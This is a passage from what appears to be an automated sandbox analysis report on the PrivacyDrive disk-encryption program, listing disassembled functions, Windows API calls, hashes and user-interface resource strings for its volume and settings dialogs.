                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0043C8C7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CREATE_VOLUME), ref: 0043C8F4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0043C906
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CREATE_VOLUME$Dialog$PM_ALIGN_LEFT$PM_CANCEL_BUTTON_BOTTOM$PM_CANCEL_BUTTON_RIGHT$PM_CANCEL_BUTTON_WIDTH$PM_CHECK_ADD_TO_FAVORITES_X$PM_CHECK_ADD_TO_FAVORITES_Y$PM_CHECK_MOUNT_AND_FORMAT_X$PM_CHECK_MOUNT_AND_FORMAT_Y$PM_CHECK_RANDOM_DATA_X$PM_CHECK_RANDOM_DATA_Y$PM_CHECK_SHOW_PW_X$PM_CHECK_SHOW_PW_Y$PM_CREATE_BUTTON_BOTTOM$PM_CREATE_BUTTON_RIGHT$PM_CREATE_BUTTON_WIDTH$PM_EDIT_DESCRIPTION_X$PM_EDIT_DESCRIPTION_Y$PM_EDIT_DIR_X$PM_EDIT_DIR_Y$PM_EDIT_FILENAME_X$PM_EDIT_FILENAME_Y$PM_EDIT_PASSWORD1_WIDTH$PM_EDIT_PASSWORD1_X$PM_EDIT_PASSWORD1_Y$PM_EDIT_PASSWORD2_WIDTH$PM_EDIT_PASSWORD2_X$PM_EDIT_PASSWORD2_Y$PM_EDIT_SIZE_WIDTH$PM_EDIT_SIZE_X$PM_EDIT_SIZE_Y$PM_GROUPLINE_ENCRYPTION_OPTIONS_Y$PM_GROUPLINE_PASSWORD_SETTINGS_Y$PM_GROUPLINE_VOLUME_FILE_Y$PM_ICON_X$PM_ICON_Y$PM_LABEL_FILE_X$PM_LABEL_FILE_Y$PM_LABEL_OFFSET_X$PM_LABEL_OFFSET_Y$PM_LIST_ALGORITHM_MENU_WIDTH$PM_LIST_ALGORITHM_WIDTH$PM_LIST_ALGORITHM_X$PM_LIST_ALGORITHM_Y$PM_LIST_CIPHER_MODE_MENU_WIDTH$PM_LIST_CIPHER_MODE_WIDTH$PM_LIST_CIPHER_MODE_X$PM_LIST_CIPHER_MODE_Y$PM_LIST_DRIVE_LETTER_MENU_WIDTH$PM_LIST_DRIVE_LETTER_WIDTH$PM_LIST_DRIVE_LETTER_X$PM_LIST_DRIVE_LETTER_Y$PM_LIST_HASH_ALGORITHM_MENU_WIDTH$PM_LIST_HASH_ALGORITHM_WIDTH$PM_LIST_HASH_ALGORITHM_X$PM_LIST_HASH_ALGORITHM_Y$PM_LIST_MENU_WIDTH$PM_LIST_MOUNT_AS_MENU_WIDTH$PM_LIST_MOUNT_AS_WIDTH$PM_LIST_MOUNT_AS_X$PM_LIST_MOUNT_AS_Y$PM_LIST_SIZE_X$PM_LIST_SIZE_Y$PM_LIST_WIDTH
                                • API String ID: 904232820-8767612
                                • Opcode ID: d85cc20238ebaeccbf9f74424504cff96e2e6bcbefdff292d491c05aa7e77163
                                • Instruction ID: 681908805238545dee743252f69b44965ca6818ddb7e7250fea782886cf940af
                                • Opcode Fuzzy Hash: d85cc20238ebaeccbf9f74424504cff96e2e6bcbefdff292d491c05aa7e77163
                                • Instruction Fuzzy Hash: 63C1FE2C380B11AEEE553222DD93B3F04476B44F59F45502ABA06BA2C1FFDED911939D
                                Function 0042A870 Relevance: 90.5, APIs: 2, Strings: 58, Instructions: 465COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004FFCFE: _malloc.LIBCMT ref: 004FFD16
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 0042A8EF
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0042A902
                                  • Part of subcall function 0042B290: EnterCriticalSection.KERNEL32(005BDCE4,00000000,0042AB00,00000050,0056C344), ref: 0042B29C
                                  • Part of subcall function 0042B290: LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0042B2AF
                                  • Part of subcall function 0042B450: EnterCriticalSection.KERNEL32(005BDCE4,00000000,0042ABA5,00000011,_pm_WINDOW_FRAME_FILLET,00000050,0056C344), ref: 0042B458
                                  • Part of subcall function 0042B450: LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0042B46B
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$_malloc
                                • String ID: COMMON_1|DISABLED$COMMON_1|HIT_BLUE$COMMON_1|HIT_GRAY$COMMON_1|HIT_YELLOW$COMMON_1|NORMAL$COMMON_1|PUSH_BLUE$COMMON_1|PUSH_GRAY$COMMON_1|PUSH_YELLOW$Common$_IMG_MENU_ICON_ADD$_IMG_MENU_ICON_EXIT$_IMG_MENU_ICON_EXPLORER$_IMG_MENU_ICON_FACEBOOK$_IMG_MENU_ICON_HOME$_IMG_MENU_ICON_PROGRAM$_IMG_MENU_ICON_REFRESH$_IMG_MENU_ICON_REMOVE$_IMG_MENU_ICON_SETTINGS$_IMG_MENU_ICON_TWITTER$_cr_CRL_BACKGROUND_BEGIN$_cr_CRL_BACKGROUND_END$_cr_CRL_BORDER_HIGH$_cr_CRL_BORDER_LOW$_cr_CRL_DEFAULT_LINE$_cr_CRL_FOCUS_LINT$_cr_CRL_GLISTEN_BEGIN$_cr_CRL_GLISTEN_CENTER$_cr_CRL_GLISTEN_END$_cr_CRL_TEXT_HIGH$_cr_CRL_TEXT_LOW$_cr_LINE_HIGH_1$_cr_LINE_HIGH_2$_cr_LINE_HIGH_3$_cr_LINE_LOW_1$_cr_LINE_LOW_2$_cr_LINE_LOW_3$_cr_TEXT_HIGH_1$_cr_TEXT_HIGH_2$_cr_TEXT_HIGH_3$_cr_TEXT_LOW_1$_cr_TEXT_LOW_2$_cr_TEXT_LOW_3$_cr_WINDOW_BACKGROUND$_cr_WINDOW_TITLE_BACKGROUND_BEGIN$_cr_WINDOW_TITLE_BACKGROUND_END$_cr_WINDOW_TITLE_TEXT$_img_TEXTURE_1$_img_TEXTURE_2$_img_TEXTURE_3$_img_TEXTURE_4$_img_TEXTURE_5$_pm_CONTROL_FILLET$_pm_WINDOW_FRAME_FILLET$_pm_WINDOW_SHADOW_BOTTOM$_pm_WINDOW_SHADOW_FILLET$_pm_WINDOW_SHADOW_LEFT$_pm_WINDOW_SHADOW_RIGHT$_pm_WINDOW_SHADOW_TOP
                                • API String ID: 362512214-366870267
                                • Opcode ID: 02d2c2e8fec6fcfa928117731b8797664b4bd875f5497783d6f55319a2f98916
                                • Instruction ID: 99d2a06c77b1579b361c2653af90561bee3f9c39090a6278bb8b7f7bbaca8c59
                                • Opcode Fuzzy Hash: 02d2c2e8fec6fcfa928117731b8797664b4bd875f5497783d6f55319a2f98916
                                • Instruction Fuzzy Hash: 54021B713403115BE704EB61EE43FA637A07B54748F44001EBE069B1D2FF69AA0AE76E
                                Function 00451320 Relevance: 60.3, APIs: 6, Strings: 34, Instructions: 262COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 00451330
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00451348
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SETTINGS), ref: 00451375
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00451387
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SETTINGS), ref: 004513B4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004513C6
                                  • Part of subcall function 0041EF30: EnterCriticalSection.KERNEL32(005BDCE4,?,?,0041DE61,Button\State,LABEL_BUTTON|NORMAL,00000001,PM_FILLET,00000000,PM_HEIGHT,00000000,Button,?,LABEL_BUTTON,?,?), ref: 0041EF3B
                                  • Part of subcall function 0041EF30: LeaveCriticalSection.KERNEL32(005BDCE4,?,0041DE61,Button\State,LABEL_BUTTON|NORMAL,00000001,PM_FILLET,00000000,PM_HEIGHT,00000000,Button,?,LABEL_BUTTON,?,?,0041E1DB), ref: 0041EF4E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: BACKGROUND_BEGIN$BACKGROUND_END$BORDER$BORDER_HL$BUTTON_RESTROE_WIDTH$DISMOUNT$DISMOUNT_SEL$Dialog$Dialog\TabbarFrame$ENCRYPTION$ENCRYPTION_SEL$FILE_ASSOCIATION$FILE_ASSOCIATION_SEL$GENERAL$GENERAL_SEL$HEIGHT$HOTKEYS$HOTKEYS_SEL$MOUNT$MOUNT_SEL$PAGE_X$PAGE_Y$PRIVACY$PRIVACY_SEL$SETTINGS$SETTINGS|$TABBAR_SELECTED$TABBUTTON_HEIGHT$TABBUTTON_LEFT$TABBUTTON_TOP$TABBUTTON_WIDTH$USER_INTERFACE$USER_INTERFACE_SEL$WIDTH
                                • API String ID: 904232820-2028568477
                                • Opcode ID: 6fa8e5afa7a1104540bc4d8a6ea7b051293c4ac48779a919dec611bf4dc3b2ca
                                • Instruction ID: 0a7017a5ae3d150980986b9a4867fdef5c690e4b5b22665d8ec40be5f36ddc5c
                                • Opcode Fuzzy Hash: 6fa8e5afa7a1104540bc4d8a6ea7b051293c4ac48779a919dec611bf4dc3b2ca
                                • Instruction Fuzzy Hash: 177149B438478623EA143622AD63B7B19856F44F4EF08443FBE05AA2E3EEDCD805955D
                                Function 0044A3C0 Relevance: 58.8, APIs: 6, Strings: 33, Instructions: 253COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 0044A3D0
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0044A3E8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,MOUNT_VOLUME), ref: 0044A415
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0044A427
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,MOUNT_VOLUME), ref: 0044A454
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0044A466
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Dialog$MOUNT_VOLUME$PM_CHECKBOX_OPEN_EXPLORER_X$PM_CHECKBOX_OPEN_EXPLORER_Y$PM_CHECKBOX_READONLY_X$PM_CHECKBOX_READONLY_Y$PM_CHECKBOX_SHOW_PASSWORD_X$PM_CHECKBOX_SHOW_PASSWORD_Y$PM_EDIT_FILENAME_WIDTH$PM_EDIT_FILENAME_X$PM_EDIT_FILENAME_Y$PM_EDIT_KEYFILE_WIDTH$PM_EDIT_KEYFILE_X$PM_EDIT_KEYFILE_Y$PM_EDIT_PASSWORD_WIDTH$PM_EDIT_PASSWORD_X$PM_EDIT_PASSWORD_Y$PM_GROUPLINE_MOUNT_OPTIONS_Y$PM_GROUPLINE_PASSWORD_Y$PM_GROUPLINE_VOLUME_Y$PM_ICON_LEFT$PM_ICON_TOP$PM_LABEL_OFFSET_X$PM_LABEL_OFFSET_Y$PM_LIST_DRIVE_LETTER_MENU_WIDTH$PM_LIST_DRIVE_LETTER_WIDTH$PM_LIST_DRIVE_LETTER_X$PM_LIST_DRIVE_LETTER_Y$PM_LIST_MOUNT_AS_MENU_WIDTH$PM_LIST_MOUNT_AS_WIDTH$PM_LIST_MOUNT_AS_X$PM_LIST_MOUNT_AS_Y$PM_STRINFO_Y
                                • API String ID: 904232820-2220584259
                                • Opcode ID: df06e37f6b5d4c361b9408e515c20cc59364c07aade7ca59aad5c6ce60f664b4
                                • Instruction ID: c4f9afd6cb9aec6b8133aea8b2e8d66464125aabc6f4f42d260c4d0119a6d538
                                • Opcode Fuzzy Hash: df06e37f6b5d4c361b9408e515c20cc59364c07aade7ca59aad5c6ce60f664b4
                                • Instruction Fuzzy Hash: 387165343C1B2126FE6073229D97B7F14666B40F85F14402ABA07BA2C1FEDCD921929E
                                Function 00422910 Relevance: 55.8, APIs: 6, Strings: 31, Instructions: 280COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 00422920
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00422938
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Edit,?,STANDARD), ref: 00422965
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00422977
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Edit,?,STANDARD), ref: 004229A4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004229B6
                                  • Part of subcall function 00424910: EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004A01A9,Dialog\Button,BASE_DIALOG|CLOSE,0000000C,INACTIVATE_TITLE_TEXT,0000000B,INACTIVATE_TITLE_END,0000000A,INACTIVATE_TITLE_BEGIN,00000009,ACTIVATE_TITLE_END,00000008), ref: 0042491C
                                  • Part of subcall function 00424910: LeaveCriticalSection.KERNEL32(005BDCE4,?,004A01A9,Dialog\Button,BASE_DIALOG|CLOSE,0000000C,INACTIVATE_TITLE_TEXT,0000000B,INACTIVATE_TITLE_END,0000000A,INACTIVATE_TITLE_BEGIN,00000009,ACTIVATE_TITLE_END,00000008,ACTIVATE_TITLE_BEGIN,00000007), ref: 0042492F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CURSOR$DISABLED_BACKGROUND$DISABLED_BORDER_HIGH$DISABLED_BORDER_LOW$DISABLED_BORDER_LOW1$DISABLED_TEXT$Edit$Edit\State$FILLET$HEIGHT$HIT_BACKGROUND$HIT_BORDER_HIGH$HIT_BORDER_LOW$HIT_BORDER_LOW1$HIT_TEXT$MARK$NORMAL_BACKGROUND$NORMAL_BORDER_HIGH$NORMAL_BORDER_LOW$NORMAL_BORDER_LOW1$NORMAL_FOCUS_BACKGROUND$NORMAL_FOCUS_BORDER_HIGH$NORMAL_FOCUS_BORDER_LOW$NORMAL_FOCUS_BORDER_LOW1$NORMAL_FOCUS_TEXT$NORMAL_TEXT$STANDARD$STANDARD|DISABLED$STANDARD|HIT$STANDARD|NORMAL$STANDARD|NORMAL_FOCUS
                                • API String ID: 904232820-1885711924
                                • Opcode ID: c7f3ae1bc7ec15da4c7bb0d608ba314374a937bdfe5e35a7b2a3aa2b322f8640
                                • Instruction ID: af619e505864c77e37c187aa64bf93df1591b4d9345df17fc4eb8bda74cb2bd7
                                • Opcode Fuzzy Hash: c7f3ae1bc7ec15da4c7bb0d608ba314374a937bdfe5e35a7b2a3aa2b322f8640
                                • Instruction Fuzzy Hash: CE81F03839072232EA2465323E13FAB59556B44F48F54402AFA09B76C3FFD9D94192ED
                                Function 00421930 Relevance: 55.8, APIs: 6, Strings: 31, Instructions: 280COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 00421940
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00421958
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Edit,?,STANDARD), ref: 00421985
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00421997
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Edit,?,STANDARD), ref: 004219C4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004219D6
                                  • Part of subcall function 0041EF30: EnterCriticalSection.KERNEL32(005BDCE4,?,?,0041DE61,Button\State,LABEL_BUTTON|NORMAL,00000001,PM_FILLET,00000000,PM_HEIGHT,00000000,Button,?,LABEL_BUTTON,?,?), ref: 0041EF3B
                                  • Part of subcall function 0041EF30: LeaveCriticalSection.KERNEL32(005BDCE4,?,0041DE61,Button\State,LABEL_BUTTON|NORMAL,00000001,PM_FILLET,00000000,PM_HEIGHT,00000000,Button,?,LABEL_BUTTON,?,?,0041E1DB), ref: 0041EF4E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CURSOR$DISABLED_BACKGROUND$DISABLED_BORDER_HIGH$DISABLED_BORDER_LOW$DISABLED_BORDER_LOW1$DISABLED_TEXT$Edit$Edit\State$FILLET$HEIGHT$HIT_BACKGROUND$HIT_BORDER_HIGH$HIT_BORDER_LOW$HIT_BORDER_LOW1$HIT_TEXT$MARK$NORMAL_BACKGROUND$NORMAL_BORDER_HIGH$NORMAL_BORDER_LOW$NORMAL_BORDER_LOW1$NORMAL_FOCUS_BACKGROUND$NORMAL_FOCUS_BORDER_HIGH$NORMAL_FOCUS_BORDER_LOW$NORMAL_FOCUS_BORDER_LOW1$NORMAL_FOCUS_TEXT$NORMAL_TEXT$STANDARD$STANDARD|DISABLED$STANDARD|HIT$STANDARD|NORMAL$STANDARD|NORMAL_FOCUS
                                • API String ID: 904232820-1885711924
                                • Opcode ID: a97565df34e25258d7543389a541b863e23140e12952659115622623b9b84d9e
                                • Instruction ID: 87115809505b870b171f376c7b5103c8a953e77f1af414b46e627d12f181bead
                                • Opcode Fuzzy Hash: a97565df34e25258d7543389a541b863e23140e12952659115622623b9b84d9e
                                • Instruction Fuzzy Hash: 78814738390712B1DA186D726D13FAF89493B60B44F44452BFE09A62D2EF9CEC46D5EC
                                Function 0046E4E0 Relevance: 55.8, APIs: 6, Strings: 31, Instructions: 279COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,00408593), ref: 0046E4F0
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,00408593), ref: 0046E508
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Edit,?,STANDARD,?,?,00408593), ref: 0046E535
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,00408593), ref: 0046E547
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Edit,?,STANDARD,?,?,00408593), ref: 0046E574
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,00408593), ref: 0046E586
                                  • Part of subcall function 00424910: EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004A01A9,Dialog\Button,BASE_DIALOG|CLOSE,0000000C,INACTIVATE_TITLE_TEXT,0000000B,INACTIVATE_TITLE_END,0000000A,INACTIVATE_TITLE_BEGIN,00000009,ACTIVATE_TITLE_END,00000008), ref: 0042491C
                                  • Part of subcall function 00424910: LeaveCriticalSection.KERNEL32(005BDCE4,?,004A01A9,Dialog\Button,BASE_DIALOG|CLOSE,0000000C,INACTIVATE_TITLE_TEXT,0000000B,INACTIVATE_TITLE_END,0000000A,INACTIVATE_TITLE_BEGIN,00000009,ACTIVATE_TITLE_END,00000008,ACTIVATE_TITLE_BEGIN,00000007), ref: 0042492F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CURSOR$DISABLED_BACKGROUND$DISABLED_BORDER_HIGH$DISABLED_BORDER_LOW$DISABLED_BORDER_LOW1$DISABLED_TEXT$Edit$Edit\State$FILLET$HEIGHT$HIT_BACKGROUND$HIT_BORDER_HIGH$HIT_BORDER_LOW$HIT_BORDER_LOW1$HIT_TEXT$MARK$NORMAL_BACKGROUND$NORMAL_BORDER_HIGH$NORMAL_BORDER_LOW$NORMAL_BORDER_LOW1$NORMAL_FOCUS_BACKGROUND$NORMAL_FOCUS_BORDER_HIGH$NORMAL_FOCUS_BORDER_LOW$NORMAL_FOCUS_BORDER_LOW1$NORMAL_FOCUS_TEXT$NORMAL_TEXT$STANDARD$STANDARD|DISABLED$STANDARD|HIT$STANDARD|NORMAL$STANDARD|NORMAL_FOCUS
                                • API String ID: 904232820-1885711924
                                • Opcode ID: 544724d2402e0c1b3abb79e0585ea74f6b2f61e244ec6e1b70a05d979e077fb9
                                • Instruction ID: db71465a6864359a492602fe9e5c16e9fc8931a9859a05d1f20c1c4b78a28152
                                • Opcode Fuzzy Hash: 544724d2402e0c1b3abb79e0585ea74f6b2f61e244ec6e1b70a05d979e077fb9
                                • Instruction Fuzzy Hash: 5D81DC3838071122EA187637AD13F6B59956B44F44F04406EFA0AA72C2FFDDD941A6EE
                                Function 004166A0 Relevance: 51.2, APIs: 6, Strings: 28, Instructions: 220COMMON
